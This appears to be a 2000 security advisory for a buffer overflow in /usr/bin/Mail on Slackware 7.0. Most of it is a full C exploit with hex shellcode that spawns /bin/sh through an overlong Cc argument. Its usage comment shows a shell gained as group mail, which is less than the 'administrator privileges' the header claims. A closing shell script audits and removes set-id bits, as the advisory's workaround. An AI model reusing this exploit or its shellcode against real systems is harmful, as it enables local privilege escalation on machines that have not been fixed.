usr/bin/Mail exploit for Slackware 7.0

Published: 2000-05-14
Updated: 2000-05-14
Severity: High
Threat: Local administrator privileges
Bug type: Input validation error
Exploitation: Server mode

Affected systems
Slackware 7.0

Description
A buffer overflow exploit for the mail command on Slackware.

Test code

/*
 * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
 *
 * Exploit for /usr/bin/Mail.
 * Made specially for Slackware Linux 7.0.
 * Based on mailx.c by funkySh.
 *
 * OBS.: Without fprintf(stderr) it is not possible to print the message.
 *
 * USAGE:
 * slack$ ./mail-slak
 * type `.` and enter: .
 * Cc: too long to edit
 * sh-2.03$ id
 * uid=1000(user) gid=12(mail) groups=100(users)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>

char buffer[10000];

/* setgid(mail)/setuid wrapper followed by execve("/bin/sh") */
char shellcode[] =
    "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31"
    "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1"
    "\x0c\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
    "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
    "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer (i386); the original relied on %eax being the
 * implicit return value, written here with an explicit output operand. */
unsigned long getesp(void)
{
    unsigned long esp;
    __asm__("movl %%esp,%0" : "=r"(esp));
    return esp;
}

int main(int argc, char **argv)
{
    int x;
    long addr = getesp() - 18000;

    /* NOP sled, shellcode at offset 800, then the guessed return address
     * repeated up to the end of the buffer */
    memset(buffer, 0x90, 10000);
    memcpy(buffer + 800, shellcode, strlen(shellcode));
    for (x = 876; x < 9998; x += 4)
        *(int *)&buffer[x] = addr;

    fprintf(stderr, "type `.` and enter: ");
    /* the oversized Cc: argument (-c) overflows the fixed buffer in Mail */
    execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s", "blah",
          "-c", buffer, (char *)0);
    return 0;
}

/* mail-slack.c: EOF */

Solution
None yet; the SUID bit can be removed.
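The workaround above is to take the set-id bit off the binary (the usage transcript shows Mail running set-gid mail, gid 12). The following shell helpers are an added example, not part of the original advisory: they report whether a file carries a set-uid or set-gid bit, list such files under a directory, and drop the bits; /usr/bin/Mail is the advisory's path, any other path is an assumption.

```shell
#!/bin/sh
# Added example (not from the advisory): audit and apply the advisory's
# workaround of removing the set-uid/set-gid bits from /usr/bin/Mail.
# Uses only POSIX find/chmod so it runs on old and new systems alike.

# Print every set-uid or set-gid regular file below each directory given.
# -perm -4000 matches the set-uid bit, -perm -2000 the set-gid bit.
# Usage: list_setid_files /usr/bin /usr/sbin
list_setid_files() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f \( -perm -4000 -o -perm -2000 \) -print
    done
}

# Return 0 when the single file given carries either set-id bit, 1 otherwise.
# -prune keeps find from descending if the argument is a directory.
has_setid_bits() {
    [ -n "$(find "$1" -prune \( -perm -4000 -o -perm -2000 \) -print)" ]
}

# Remove both bits; the program then runs with the caller's own uid/gid,
# so an overflow in it no longer yields gid mail (or root) to a local user.
drop_setid_bits() {
    chmod u-s,g-s "$1"
}

# Applying the workaround to the advisory's binary (path assumed to exist):
# if has_setid_bits /usr/bin/Mail; then drop_setid_bits /usr/bin/Mail; fi
```

Dropping the bit also breaks delivery into group-owned mail spools, so treat it as the stop-gap the advisory calls it until a fixed Mail is available.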